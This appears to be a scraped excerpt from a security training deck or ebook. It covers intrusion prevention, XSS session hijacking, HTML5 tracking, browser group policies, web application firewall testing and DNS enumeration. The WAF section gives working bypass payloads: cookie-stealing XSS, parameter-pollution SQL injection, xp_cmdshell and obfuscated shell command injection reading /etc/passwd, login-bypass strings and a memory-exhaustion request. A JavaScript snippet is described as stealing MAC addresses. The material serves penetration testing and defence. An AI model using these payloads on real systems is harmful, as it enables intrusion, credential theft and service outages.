  • 83. 255 | P a g e IPS Types 1. Network-based intrusion prevention system (NIPS): monitors the entire network for suspicious traffic by analyzing protocol activity. 2. Wireless intrusion prevention systems (WIPS): monitors a wireless network for suspicious traffic by analyzing wireless networking protocols. 3. Network behavior analysis (NBA): examines network traffic to identify threats that generate unusual traffic flows, such as distributed denial of service (DDoS) attacks, certain forms of malware, and policy violations. 4. Host-based intrusion prevention system (HIPS): an installed software package which monitors a single host for suspicious activity by analyzing events occurring within that host. Detection Methods 1. Signature-Based Detection: This method of detection utilizes signatures, which are attack patterns that are preconfigured and predetermined. A signature-based intrusion prevention system monitors the network traffic for matches to these signatures. Once a match is found the intrusion prevention system takes the appropriate action. Signatures can be exploit-based or vulnerability- based. Exploit-based signatures analyze patterns appearing in exploits being protected against, while vulnerability-based signatures analyze vulnerabilities in a program, its execution, and conditions needed to exploit said vulnerability. 2. Statistical anomaly-based detection: This method of detection baselines performance of average network traffic conditions. After a baseline is created, the system intermittently samples network traffic, using statistical analysis to compare the sample to the set baseline. If the activity is outside the baseline parameters, the intrusion prevention system takes the appropriate action. 3. Stateful Protocol Analysis Detection: This method identifies deviations of protocol states by comparing observed events with “predetermined profiles of generally accepted definitions of benign activity.
  • 84. 256 | P a g e Signature Catalog:
  • 85. 257 | P a g e Alert Monitoring:
  • 86. 258 | P a g e Security Reporting:
  • 87. 259 | P a g e Alert Monitor:
  • 88. 260 | P a g e Anti-Virus: Web content protection & filtering Session Hi-Jacking and Internal Network Man-In-The- Middle XSS Attack Vector The attack flow: 1. The attacker finds an XSS vulnerability in the server/website/web application 2. The attacker creates an encoded URL attack string to decrease suspicion level 3. The attacker spreads the link to a targeted victim or to a distribution list 4. The victim logs into the web application, clicks the link 5. The attacker’s code is executed under the victims credentials and sends the unique session identifier to the attacker
  • 89. 261 | P a g e 6. The attacker plants the unique session identifier in his browser and is now connected to the system as the victim The Man-In-The-Middle Attack Vector • Taking over an active session to a computer system • In order to attack the system, the attacker must know the protocol/method being used to handle the active sessions with the system • In order to attack the system, the attacker must achieve the user’s session identifier (session id, session hash, token, IP) • The most common use of Session Hi-jacking revolves around textual protocols such as the HTTP protocol where the identifier is the ASPSESSID/PHPSESSID/JSESSION parameter located HTTP Cookie Header aka “The Session Cookie” • Most common scenarios of Session Hi-Jacking is done with combination with: • XSS - Where the session cookie is read by an attacker’s JavaScript code • Man-In-The-Middle – Where the cookie is sent over clear-text HTTP through the attacker’s machine, which becomes the victim’s gateway
  • 90. 262 | P a g e
  • 91. 263 | P a g e
  • 92. 264 | P a g e
  • 93. 265 | P a g e
  • 94. 266 | P a g e HTML5 and New Client-Side Risks Cookie/Repository User Tracking Tracking Users Using HTML5 Local Storage Feature • HTML5 provides feature that allows planting persistent information in users computers • A tracker can be planted pre-emptively or during an identified attack • Since the information is persistent it is possible to retrieve it and inspect it at any date and the attacker can be identified
  • 95. 267 | P a g e Tracking Users Using HTML5 Local Storage Feature • Types of “Ever Cookies” (tracking features) • Standard HTTP Cookies • Silverlight Isolated Storage • Local Shared Objects (Flash Cookies) • Storing cookies in RGB values of auto-generated, force-cached PNGs using HTML5 Canvas tag to read pixels (cookies) back out • Storing cookies in and reading out Web History • Storing cookies in HTTP ETags • Internet Explorer userData storage • HTML5 Session Storage • HTML5 Local Storage • HTML5 Global Storage • HTML5 Database Storage via SQLite
  • 96. 268 | P a g e User TraceBack Techniques JAVA Trackback Techniques
  • 97. 269 | P a g e MAC ADDRESS Detection Of All Network Interfaces via JAVA You can steal the user’s MAC address with Java 1.6. For Internet Explorer you can use an applet. This information is very sensitive, because the MAC address is a unique identifier. Although it can be easily changed by the user, it can be useful to identify some users with dynamic IP address or using proxies. function get_mac() { try { var ifaces = java.net.NetworkInterface.getNetworkInterfaces() var ifaces_list = java.util.Collections.list(ifaces); for (var i = 0; i < ifaces_list.size(); i++) { var mac = ifaces_list.get(i).getHardwareAddress(); if (mac) { return mac; } } } catch (e) { } return false;
  • 98. 270 | P a g e } XSS + Browser Location Services Browser/Smart-Phone Location Services Browser Location Services (FireFox)
  • 99. 271 | P a g e Browser Location Services (Google Chrome)
  • 100. 272 | P a g e Browser Location Services Working Behind Tor Anonymity Network
  • 101. 273 | P a g e Use your power to protect and enforce – GPO Policy name Policy path Prevent Deleting Download History Windows ComponentsInternet ExplorerDelete Browsing History Disable add-on performance notifications Windows ComponentsInternet Explorer Enable alternative codecs in HTML5 media elements Windows ComponentsInternet ExplorerInternet Control PanelAdvanced settingsMultimedia Allow Internet Explorer 8 Shutdown Behavior Windows ComponentsInternet Explorer Install binaries signed by MD2 and MD4 signing technologies Windows ComponentsInternet ExplorerSecurity FeaturesBinary Behavior Security Restriction Automatically enable newly installed add-ons Windows ComponentsInternet Explorer Turn off Managing SmartScreen Filter Windows ComponentsInternet Explorer Prevent configuration of top result search in the Address bar Windows ComponentsInternet ExplorerInternet SettingsAdvanced settingsSearching Prevent Deleting ActiveX Filtering and Tracking Protection data Windows ComponentsInternet ExplorerDelete Browsing History Go to an intranet site for a single word entry in the Address bar Windows ComponentsInternet ExplorerInternet SettingsAdvanced settingsBrowsing Show tabs below Address bar Windows ComponentsInternet ExplorerToolbars Prevent users from bypassing SmartScreen Filter's application reputation warnings about files that are not commonly downloaded from the Internet Windows ComponentsInternet Explorer Disable Browser Geolocation Windows ComponentsInternet
  • 102. 274 | P a g e Explorer Turn off ability to pin sites Windows ComponentsInternet Explorer Turn on ActiveX Filtering Windows ComponentsInternet Explorer Configure Tracking Protection Lists Windows ComponentsInternet ExplorerPrivacy Tracking Protection Threshold Windows ComponentsInternet ExplorerPrivacy Turn off Tracking Protection Windows ComponentsInternet ExplorerPrivacy  Prevent users from bypassing SmartScreen Filter’s applications reputation warnings about files that are not commonly downloaded from the Internet  Prevent Deleting Download History
  • 103. 275 | P a g e  Install binaries signed by MD2 and MD4 signing technologies  Do not automatically enable newly installed add-ons
  • 104. 276 | P a g e  Turn off Managing SmartScreen Filter  Turn on ActiveX filtering
  • 105. 277 | P a g e  Enable alternate codecs in HTML5 media elements  Prevent Deleting ActiveX Filtering and Tracking Protection data
  • 106. 278 | P a g e  Disable Browser Geolocation (“Browser Location Services”)
  • 107. 279 | P a g e Make sure Internet Explorer Protected Mode Is Enforced:
  • 108. 280 | P a g e Choosing, Implementing and Testing Web Application Firewalls Web applications have some serious vulnerabilities, and WAF provides a very important extra protection layer to the web solution. Hackers can find access points through errors in code, and we find that having a WAF in front of our web application is very important for security. WAF acts as a special mechanism governing the interaction between the server and client while processing the HTTP-packets. It also provides a way to monitor the data as it is received from the outside. The solution is based on a set of rules that exposes if there is an attack targeting the server. Usually, the web application firewall aims to protect large websites like banks, online retailers, social networks, large companies… But now anyone can use it now that we have some open-source solutions available. WAF can be implemented in two ways, via hardware or software, and in three forms: 1. Implemented as a reverse proxy server. 2. Implemented in routing mode / bridge. 3. Integrated in the Web application. The first form can be as mod_security , Barracuda , nevisProxy . These types of WAF Automatically block or redirect the request to the web server without any changes or editing data. The second category consists mainly of hardware WAF, for example, Imperva SecureSphere (impervaguard.com). These solutions require additional configuration on the internal network, but eventually the option gains in productivity. And finally, the third type implies the existence in the Web application like integrating the WAF in the CMS. WAF rules contain a Blacklist (compared with a list of unacceptable actions) and Whitelist (accepted and permitted actions), for example we can find in the black list strings like: «UNION SELECT», «< script>», «/ etc / passwd» while whitelist rules may contain a number parameters value (from0 to 65535). Detecting Web Application Firewalls We will now look at how pentesting can detect the WAF server and more importantly how to bypass it. Each firewall has a special method in responding that helps in identifying the type of WAF implemented (fingerprint) for example:
  • 109. 281 | P a g e • HTTP-response cookies parameters. • Modifying HTTP-headers to mask the server • The way of responding to a special data and queries • The way in closing connection under not authorized actions. For example, when we launch an attack on mod_security we get 501 error code; WebKnight – the code 999; Barracuda on cookie-parameter barra_counter_session. This can certainly help in identifying the WAF, and there are some scanners that can automate the operation so you will be able to get the information like w3af a framework plug-in WAF_fingerprint and wafw00f. These tools are important for the pentesting operation. Next part will be looking at different technics to bypass web application firewall and exploit most popular vulnerabilities. Here are several options available in wafw00f:
  • 110. 282 | P a g e Then I run the wafw00f against the webserver by giving the command: wafw00f.py http://localhost and here is the result: The tool can detect the WAF correctly.
  • 111. 283 | P a g e Bypassing Web Application Firewalls There is no single ideal system in the world, and this applies to Web application firewalls too (WAF’s). While the advantages and positive features far outweigh the negative in WAF’s, one major problem is there are only a few action rules allowed. The white list is expanding, and requires more development efforts because it is very important to clearly establish allowed parameters. The second major problem is that sometimes WAF vendors fail to update their signature definitions, or do not develop the required security rule on time, and this can put the web server at risk of attacks. The first vulnerability is (http://www.security-database.com/detail.php?alert=CVE-2009-1593), which allows the inserting extra characters in the JavaScript close tag to bypass the XSS protection mechanisms. An example is shown below: http://testcases/phptest/xss.php?var=%3Cscript%3Ealert(document.cookie)%3C/script%20ByPas s%3 Another example (http://www.security-database.com/detail.php?alert=CVE-2009-1594) also allows remote attackers to bypass certain protection mechanisms via a %0A (encoded newline), as demonstrated by a %0A in a cross-site scripting (XSS) attack URL. HTTP Parameter Pollution (HPP) HPP was first developed by two Italian network experts, Luca Carettoni and Stefano diPaola. HPP provides an attacker the ability to submit new HTTP-parameters (POST, GET) with multiple input parameters (query string, post data, cookies, etc.) with same name. The application may react in unexpected ways and open up new avenues of server-side and client-side exploitation. The most outstanding example is a vulnerability in IIS + ModSecurity which allows SQL-injection based attacks on two features: 1. IIS HTTP parameters submit the same name. for Example: POST /index.aspx?a=1&a=2 HTTP/1.0 Host: www.example.com Cookie: a=5;a=6 Content-type: text/plain Content-Length: 7 Connection: close a=3&a=4 If such a request to IIS/ASP.NET setting a (Request.Params["a"]) is equal to 1,2,3,4,5,6. 2. ModSecurity analyzes the request after that it has been already processed by webserver. And reject it: http://testcases/index.aspx?id=1+UNION+SELECT+username,password+FROM+users However the query submitted:
  • 112. 284 | P a g e POST /index.aspx?a=-1%20union/*&a=*/select/* HTTP/1.0 Host: www.example.com Cookie: a=*/from/*;a=*/users Content?Length: 21 a=*/name&a=password/* The database as a result will do the correct query: SELECT b, c FROM t WHERE a =- 1 /*,*/ UNION /*,*/ SELECT /*,*/ username, password /*,*/ FROM /*,*/ users XSS Cross Site Scripting (XSS) is probably the best method for exploiting the Web application firewall (WAF). This is due to JavaScript’s flexibility. At the BlackHat conference, there were a large number of methods to trick filters. For example: object data=”javascript:alert(0)” isindex action=javascript:alert(1) type=image img src=x:alert(alt) onerror=eval(src) alt=0 x:script xmlns:x=”http://www.w3.org/1999/xhtml” alert (‘xss’); x: script Examples: 1. Profense Web Application Firewall Security Bypass Vulnerabilities Attackers can exploit the issue via a browser. The following example URIs are available: http://www.example.com/phptest/xss.php?var=%3CEvil%20script%20goes%20here%3E=%0AB yPass http://www.example.com/phptest/xss.php?var=%3Cscript%3Ealert(document.cookie)%3C/script %20ByPass%3E 2. Finding: IBM Web Application Firewall Bypass The IBM Web Application Firewall can be evaded, allowing an attacker to exploit web vulnerabilities that the product intends to protect. The issue occurs when an attacker submits repeated occurrences of the same parameter.
  • 113. 285 | P a g e The example shown below uses the following environment: A web environment using Microsoft IIS, ASP .NET technology, Microsoft SQL Server 2000, being protected by the IBM Web Application Firewall. As expected, the following request will be identified and blocked (depending of configuration) by the IBM Web application firewall. http://sitename/find_ta_def.aspx?id=2571&iid='; EXEC master..xp_cmdshell "ping 10.1.1.3" -- IIS with ASP.NET (and even pure ASP) technology will concatenate the contents of a parameter if multiple entries are part of the request. http://sitename/find_ta_def.aspx?id=2571&iid='; EXEC master..xp_cmdshell &iid= "ping 10.1.1.3" -- IIS with ASP.NET (and even pure ASP) technology will concatenate both entries of iid parameter, however it will include an comma "," between them, resulting in the following output being sent to the database. '; EXEC master..xp_cmdshell , "ping 10.1.1.3" -- The request above will be identified and blocked (depending of configuration) by IBM Web application firewall, because it appears that "EXEC" and "xp_cmdshell" trigger an attack pattern. However, it is possible to split all the spaces in multiple parameters. For example: http://sitename/find_ta_def.aspx?id=2571&iid=';&iid=EXEC&iid=master..xp_cmdshell&iid="pi ng 10.1.1.3" &iid= -- The above request will bypass the affected IBM Web application firewall, resulting in the following output being sent to the database. '; , EXEC , master..xp_cmdshell , "ping 10.1.1.3" , -- However, the above SQL code will not be properly executed because of the comma inserted on the SQL query, to solve this situation we will use SQL comments. http://sitename/find_ta_def.aspx?id=2571&iid='; /*&iid=1*/ EXEC /*&iid=1*/ master..xp_cmdshell /*&iid=1*/ "ping 10.1.1.3" /*&iid=1*/ --
  • 114. 286 | P a g e The above request will bypass IBM Web application firewall, resulting in the following output being sent to the database, which is a valid and working SQL code. '; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ "ping 10.1.1.3" /*,1*/ -- The above code will execute the ping command on the Microsoft Windows backend, assuming the application was running with administrative privileges. This attack class is also referenced sometimes as HTTP Pollution Attack, HTTP Parameter Pollution (HPP) and HTTP Parameter Concatenation. The exploitability of this issue depends of the infrastructure (WebServer, Development Framework Technology, etc) technology being used. Circumvention of default WAF filtering mechanisms The following section discusses possibilities to circumvent default filtering mechanisms of the tested web application firewalls. The perl script for an automated evaluation of filtering mechanisms developed during this project (see section 4.2) tests the filtering capabilities by trying to exploit previously known and implemented vulnerabilities. As attacks against web applications can typically be conducted using a variety of different means (character encoding, usage of different keywords or functions, obfuscation using comments, etc), the very same attacks can be conducted by a number of differently assembled requests. As web application firewalls typically operate using a blacklist approach and allow all requests that do not match the blacklists, attacks can to some extent be obfuscated and pass the filtering engines. All attacks that have been marked as blocked by the automated perl script have been analysed manually to determine the effectiveness of the filtering procedures in connection with that specific test case. As not all test cases can be covered here and possibilities for circumvention are partly the same, the following chapter gives an overview of the found options for circumvention. Please note that the bypass of filtering mechanisms if often demonstrated in connection with a web application firewall product. The fact that the issue is shown at the example of a product does not mean that products of other vendors are not also susceptible to the same circumvention technique shown. In connection with the test case 601 (command execution) the Hyperguard web application firewall does not allow to print the contents of the /etc directory (e.g. cat /etc/passwd). The restriction is only limited on this directory. On the other side an attacker can enumerate all the server content using the ls command and also read files using the cat-command for files the user www-data has access to and that are not in the /etc directory. Blocking access to /etc surely
  • 115. 287 | P a g e lowers the impact of an attack as several configuration files cannot be easily read, but does not protect other system resources in other directories that can also be used to gather information or sensitive data. Another example for incompletely implemented regular expressions for filtering is the easy bypass of the cross-site scripting filter mechanism of Hyperguard. In the following listing only the first line is blocked. All other requests are not blocked by the web application firewall and therefore enable an attacker to include arbitrary script code: < script > alert (1) </ script > < script + abc > alert (1) </ script + abc > < script > alert (1) </ script > < SCRIPT > alert ( String . fromCharCode (88 ,83 ,83) ) </ SCRIPT > The following example regarding the BIG-IP web application firewall shows clearly that a blacklist-based approach in some cases cannot effectively protect a web application infrastructure. An attack may be slowed down or less experienced attackers using standard exploit mechanisms may be kept off, but the defense is nevertheless insufficient. The following demonstration is related to test case 601 (command execution), where an attacker is able to inject arbitrary commands that are executed with the privileges of the web server. The affected script enables users to ping hosts by entering an IP address. The given IP address is then passed to the command line tool ping and the results are echoed back to the user. A normal invocation of the according PHP script looks like follows: 46Figure 2: Command execution via environment variables obfuscation. 1 cmd_exec . php ? ip =4.2.2.1 If an attacker tries to append additional commands to the parameter, the web application firewall blocks the request. The following request is for example blocked because the whoami command matches one of the built-in blacklist filters: 1 cmd_exec . php ? ip =4.2.2.1; whoami In order to circumvent the filter it is possible to make use of the fact that the Apache web server by default runs with the privileges of an ordinary user (www-data) which has access to technical resources and capabilities like other users or processes. That means that the web server process also has access to environment variables that can be read an written. An attacker can use this fact to write the command to be executed in parts to environment variables and execute them afterwards. The following listing shows how the command whoami is split into two parts, written to environment variables and used for command execution: 1 4.2.2.1; a= who ; b= ami ; $a$b
  • 116. 288 | P a g e As the request does not match any blacklist filters, it is passed to the web server, where the command is executed (see figure 2). The same methodology (using environment variables) can be used to bypass the afore mentioned restricted access to the /etc directory of the Hyperguard web application firewall. Whereas the first access attempt in the following listing is denied, the second one leads to success and reveals the contents of the systems password file: 1 4.2.2.1; cat / etc / passwd 2 4.2.2.1; a= etc ; cat /$a / passwd Test case 702 ( mysqlinjection get) o ers a login form which is vulnerable to SQL injection attacks. To bypass the login an attacker needs to inject SQL syntax in order to instruct the database to return a valid user even if the passwords to not match. The Hyperguard web application firewall blocks according requests where injected SQL syntax is recognized. The filter can however be bypassed by entering comment characters that are not interpreted by the database but circumvent the blacklist filter. In the following listing the first request is blocked by the web application firewall, but the second one is forwarded to the web server enabling an attacker to log in as userA without knowledge of the according password: 471 userA ' or 1=1/* 2 userA '/**/ or 1=1/* Another problem as far as this test case is concerned occurs in connection with the Mod- Security web application firewall where the default ruleset can also be bypassed. The attack makes use of a syntax issue in connection with the MySQL database. Whereas other databases require explicit comparisons (e.g. or 1=1) to construct a true statement, MySQL also accepts the following statements as true: 1 or 1 2 or TRUE 3 or version () 4 or sin (1) 5 ...
  • 117. 289 | P a g e Whereas the first request in the following listing is blocked (ModSecurity detects the SQL Syntax because of the single quote in connection with the equality sign), the other requests are passed on to the web server and are successfully processed by the database. The blacklist filter is bypassed because of the missing comparison. 1 userA ' or 1=1# 2 userA ' or 1# 3 userA '+ ' '/* The blacklist filter of phion airlock works according to a multiple keyword matching approach. If a request contains a single quote or an equality sign, the request is not blocked. The request is only dropped if it contains both signs at the same time. The same holds true for requests containing SQL comment signs (--, #, /*). Beside the possibilities to bypass filtering rules that try to mitigate critical vulnerabilities like cross-site scripting, command execution and SQL injection, there are also certain areas where the filtering rules of the tested web application firewalls seem to operate in a reasonable way. The following areas tended to be hard to circumvent: • Remote and local file inclusion (possibilities to rewrite requests that still have the same meaning are limited in this area) • Cookie-related vulnerabilities (current web application firewalls replace all cookie contents by a single and randomly chosen cookie) Whereas some of the blocked vulnerabilities also could not be exploited by rewriting the original requests of the perl script, it could be shown that the blacklist-approach adopted by web application firewalls lacks of full coverage of all possible attack vectors. Because of the huge amount of different encodings, notations and possible syntaxes it is hard to cover all possible attacks. An additional problem the developers of such blacklists face is that with risen coverage of attack vectors also the number of false positives rises. While a general blocking of all special characters (as these are used for command separation or syntax designation in programming languages) would prevent many vulnerabilities from being exploitable, but this would also render many web applications useless because of the high number of false positives. The conclusion of the circumvention attempts carried out by the project team can be summarized as follows: With a purely blacklist-based approach (as many web application firewalls work today) there is always a balance between the non-effectiveness of the filter Mechanisms and the number of false positives (and therefore falsely blocked user requests) the operators of a web application infrastructure have to face. Even if a first attempt to exploit is blocked, a 100% coverage of all encoded attacks cannot be achieved.
  • 118. 290 | P a g e The following descriptions of HTTP requests have been modeled and were used for the testing efforts: • HTTP Basic Authentication • HTTP GET • HTTP HEAD • HTTP POST (formdata) • HTTP POST (urlencoded) • HTTP SOAP All descriptions have been used to send data to the web server using the web application Firewalls as reverse proxies. Therefore the web application Firewalls had to process the malformed requests. Results All web application Firewalls have been tested using all developed descriptions during a period of three weeks. In connection with phion airlock, Breach Security ModSecurity and F5 Networks BIG-IP ASM no implementation flaws in the parsing routines could be detected. As far as Artofdefence Hyperguard is concerned, a denial of service vulnerability could be found. The vulnerability was triggered by the test cases 3465 to 3470 of the description for HTTP POST (formdata). The test cases do not lead to an immediate crash of the system but rather in a high system load as far as CPU and memory usage are concerned resulting in repeatedly unanswered requests in the range of the aforementioned test cases. To demonstrate the causes of the vulnerability, the HTTP request generate by test case 3465 is shown in the following listing: POST directory / anysite . jsp HTTP /1.1 Host : webapphost . com User - Agent : Mozilla /5.0 ( Windows ;en - GB ; rv :1.8.0.11) Gecko /20070312 Firefox.../1.5.0.11 Accept : text / xml , text / html ;q =0.9 , text / plain ;q =0.8 , image / png ,*/*; q =0.5 Accept - Language : en -gb , en ;q =0.5 Accept - Encoding : gzip , deflate Accept - Charset : ISO -8859 -1 , utf -8; q =0.7 ,*; q =0.7 Keep - Alive : 300 Connection : keep – alive Content - Type : multipart / form - data ; boundary ...= - - - - - - - - - - - - - - - - - - - - - - - - - - -103832778631715 5511 Content - Length : 134217718 - - - - - - - - - - - - - - - - - - - - - - - - - - -103832778631715 Content - Disposition : form - data ; name =" name " MyName
  • 119. 291 | P a g e - - - - - - - - - - - - - - - - - - - - - - - - - - -103832778631715 Content - Disposition : form - data ; name =" param2 " value2 - - - - - - - - - - - - - - - - - - - - - - - - - - -103832778631715 - - As can be seen, the POST request sends form contents using a valid multipart/form-data encoding. The abnormality in the shown request can be found in the Content-Length header which is set to an unreasonably high value not representing the length of the data actually sent. As far as could be found out without access to the source code of the implementation, the length value is used to allocate memory on the system. Simultaneously the requests lead to a high CPU load if sent repeatedly. It could be found out that child processes serving the requests (and allocating the high amount of memory) are not immediately killed after the (per se too short) request was finished but persist for several seconds. By choosing a high Content-Length number and send repeated requests an attacker is therefore able to consume significant system resources. A denial of service cannot be achieved with a single request (as long as the attacked system has enough RAM) because Artofdefence Hyperguard works as a module for the Apache web server which discards requests with a too high length (depending on the configuration). The vulnerability can be used to provoke a kernel panic as the values for free RAM and free SWAP space steadily decrease to zero. Afterwards the system has to be rebooted in order to be functional again. The vulnerability was reported to the vendor on the 22nd of May 2009 using the bug tracking system. An updated version of the product is now available. Figure 4: Successful cross-site scripting attack in Hyperguard management interface. 4.6 Conduction of penetration tests
  • 120. 292 | P a g e The following chapter covers the results of penetration tests that have been conducted on the web application firewall administration interfaces. Please note that the tests were only of limited scope as they were not the main objective of the project. The tests here only cover the administrative functions of the products that normally are only available to administrators (management interfaces). While testing the administrative interfaces it could be found out that they are not covered by the same ruleset that is applied to the web applications to be protected. In general that enables to exploit found vulnerabilities more easily than with an additional protective ruleset. The following URL demonstrates a cross-site scripting in the management interface of the tested version of Hyperguard (already fixed in the current release): https://10.25.99.12:8082/adminserver/python/gwtguiserver.py/getDebug?sessioni...%3 Chtml%3E%3Cbody%20onload%3dalert('xss')%3Ed=1 Figure 4 shows the vulnerability that can for example be used to steal cookies or to phish login data with the help of an unaware user. The vulnerability only affects users of Microsoft’s Internet Explorer 7 because the browser parses documents where a closing html- and body-tag is missing. Other browsers do not parse such documents. If the closing tags are included, the web application firewall masks the brackets and therefore stops the attack. However, there is a second cross-site scripting vulnerability in the Hyperguard management interface that is interpreted by all browsers. The vulnerability is triggered when a new user is added by an administrator. If the username contains script code, the value is printed to the user list without filtering. The impact of the vulnerability is considered low because it can only be exploited by a user that already has administrative privileges. Nevertheless it enables an attacker to steal accounts of other administrative users with possibly higher privileges (e.g. by stealing the cookies using the cross- site scripting vulnerability). The vulnerabilities have been reported to the vendor of Hyperguard and are already fixed in the current release. The management interface of the F5 Networks BIG-IP web application firewall is also prone to a cross-site scripting vulnerability. The affected function is used to display error messages in case a request to the administration interface cannot be served successfully.
  • 121. 293 | P a g e Figure 5: Successful cross-site scripting attack in BIG-IP management interface. Error message displayed to the user is not escaped properly, enabling an attacker to insert arbitrary script code. The vulnerability can be demonstrated by accessing the following URL: https://192.168.11.13/dms/login.php?msg_id=<script>alert(1)</script> Figure 5 shows that script code is executed in the context of the browser session enabling an attacker to steal cookies, etc. At the time of finding the vulnerability was already known by the vendor and fixed in an updated release. The web interface of phion airlock is protected by a login that requires a valid username and the according password. All users of the web interface are also system users and are able to log in via SSH for example. The fact that users are stored as system users and given the standard Solaris operation system settings leads to the situation that all passwords are truncated at 8 characters without a specific warning. This enables an attacker to conduct brute force attempts more easily even though success is still unlikely if a good password is chosen. phion airlock (version 4.1-10.41) is also vulnerable to a remote denial of service attack on the management network interface. This vulnerability affects all protected web servers and applications, because after exploitation the web application firewall cannot handle any further requests and must be restarted manually. In order to conduct the denial of service there is no authentication needed, so the attack can be started by an internal attacker with access to the management network interface or via cross-site request forgery with a single HTTP GET request. The vendor describes the vulnerability as follows: "The airlock Configuration Center shows many system monitoring charts to check the system status and history. These images are generated on the fly by a CGI script, and the image size is
  • 122. 294 | P a g e part of the URL parameter. Unreasonably large values for the width and height parameters will cause excessive resource consumption. Depending on the actual load and the memory available, the system will be out-of-service for some minutes or crash completely, making a reboot necessary. After the initial reporting, further research showed that the vulnerability can also be used to execute arbitrary system commands. This allows attackers to run operating system commands under the user of the web server (uid=12359(wwwca) gid=54329(wwwca)). The vulnerability was reported on April 29th, 2009. According exploits will not be published. Both security flaws were addressed by a hotfix and were patched with airlock HF4112. The vulnerabilities are also fixed now within airlock release 4.1-11.18. Conclusion The general impression of web application firewall technology gained during this project is that web application firewalls can indeed raise the security level of certain vulnerable applications. Nevertheless it must be clearly stated that the additional layer of defense is partly porous and does not replace the secure development and operation of web applications. It also must not be overseen that a web application firewall is an additional device that is placed between the client and the web server and is therefore an additional device that can have influence on the availability of the overall system. It is also an additional system that can have vulnerabilities or other forms of implementation flaws and requires regular maintenance. Additionally it has been shown that web application firewalls can also be the target of successful attacks (cross-site scripting flaws, cross-site request forgery, denial of service, command execution, etc.). When defining rules for a specific web application or modifying the standard ruleset it is very important to test the whole web application and all provided functions for their correct functionality. This can for example be done using automated testing frameworks. In the course of the project often certain functionalities of the web applications used for testing have been rendered unfunctional because of predefined rules of the web application firewalls. As unexpected side effects like this can occur with every change of the rules or the web application itself, comprehensive testing is necessary. The use of web application firewalls can generally be recommended for virtual patching purposes. That means that between the emerging of a new and previously unknown vulnerability and the deployment of the new and tested release possible attacks to the vulnerable application can be blocked by the web application firewall. That also gives developers and testers more time to develop a source code patch while the vulnerability is virtually patched in the meantime. Additionally, web application firewalls can also provide a baseline protection
  • 123. 295 | P a g e Certain vulnerabilities of the application are protected, even if they are not yet. An organization using web application firewalls must however be aware that these products cannot cover all vulnerability classes at the same level. The vulnerable test applications developed in the course of this project have been used to determine which classes are covered to which degree. Whereas vulnerability classes like browser-based attacks, interpreter injection and inclusion of external content have been covered in 60-70% of all cases, other classes like information disclosure or brute force are hardly handled. Whether the reached percentage provides enough protection for a certain application must be decided individually for each case. Generally speaking, the protection level for the three vulnerability classes mentioned above was higher than expected. It is nevertheless advisable to invest in the secure development of web applications and not just in web application firewalls as certain vulnerability classes can hardly be covered or requires that vulnerabilities of the application to be protected are already known.
  • 124. 296 | P a g e High Level Distributed Denial of Service R-U-Dead-Yet R-U-Dead-Yet, or RUDY for short, implements the generic HTTP DoS attack via long form field submissions. More technical details about layer-7 DDoS attacks can be found in this OWASP lecture: This tool runs with an interactive console menu, automatically detecting forms within given URL, and allowing the user to choose which forms and form fields are desirable to use for the POST attack. In addition, the tool offers unattended execution by providing the necessary parameters within a configuration file. In version 2.x RUDY supports SOCKS proxies and session persistence using cookies when available. The Past
  • 125. 297 | P a g e SlowRois Slowloris is a piece of software written by Robert "RSnake" Hansen which allows a single machine to take down another machine's web server with minimal bandwidth and side effects on unrelated services and ports. Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. It accomplishes this by opening connections to the target web server and sending a partial request. Periodically, it will send subsequent HTTP headers, adding to—but never completing—the request. Affected servers will keep these connections open, filling their maximum concurrent connection pool, eventually denying additional connection attempts from clients.
  • 126. 298 | P a g e PyLoris: QSlowloris
  • 127. 299 | P a g e Slowloris Mitigation:
  • 128. 300 | P a g e Protecting DNS Servers & Detecting DNS Enumeration Attacks The following enumeration techniques are based on the DNS protocol and are: • Reverse DNS lookup Performs a PTR request to get the host name from IP address. • Name servers record lookup Get the authoritative name server for each domain enumerated on the target host. • Mail exchange record lookup Get the MX records for each domain enumerated on the target host. • DNS AXFR zone transfer The name server that serves the target machine's domain zone can be prone to a zone transfer vulnerability. This allow an attacker to perform a AXFR zone transfer and get a dump of the complete DNS zone, so all records, served by this name server. The AXFR vulnerability can already simply be checked with dig utility. For example if we want to check the DNS server 1.2.3.4, authoritative name server for domain foo.com. We can do it with the following syntax and if you get an output like that the DNS server is vulnerable. $ dig -t axfr 1.2.3.4 foo.com ; <<>> DiG 9.6.1-P2 <<>> -t axfr 1.2.3.4 foo.com ; (1 server found) ;; global options: + cmd foo.com. 38400 IN SOA ns1.foo.com. admin.foo.com. 2006081401 28800 3600 604800 38400 foo.com. 38400 IN NS 127.0.0.1.foo.com. foo.com. 38400 IN MX 10 mta.foo.com. mta.foo.com. 38400 IN A 192.168.0.3 ns1.foo.com. 38400 IN A 127.0.0.1 www.foo.com. 38400 IN A 192.168.0.2 foo.com. 38400 IN SOA ns1.foo.com. admin.foo.com. 2006081401 28800 3600 604800
  • 129. 301 | P a g e 38400 ;; Query time: 0 mse ;; SERVER: 1.2.3.4#53(1.2.3.4) ;; WHEN: Wed De 23 15:27:24 2009 ;; XFR size: 7 re cords (messages 1, bytes 207) • Host name brute-forcing Using a brute-forcing tries to guess can host name on the enumerated domain that resolve as the target IP address. For example if the do-main foo.com has been enumerated the host name brute-forcer will check for third level names like: www.foo.com, www1.foo.com, db.foo.com and whatever word listed in the dictionary used. • DNS TLD expansion Use a brute-forcing of top level domain part for already enumerated domain. For example, if the domain foo.com has been enumerated the TLD expansion or TLD brute-forcing plugin will check for different TLD for the same domain like: foo.org, foo.net, foo.it and whatever TLD listed in the TLD dictionary. SSL/TLS Protocol enumeration techniques The following enumeration techniques are based on the SSL/TLS protocol and are: • X.509 Certificate Parsing Sometimes the target machine can publish some HTTPS services. A connection is tried to the common HTTP and HTTPS service ports and is tried to negotiate an SSL/TLS connection, if the remote server supply a X.509 certificate the host name is taken from the issuer and subject Common Name (CN) eld and from alternate subject extension eld. 4.2.3 Passive web enumeration techniques The following enumeration techniques are based on third party web sites and public databases. • Search engines The following search engines are used:
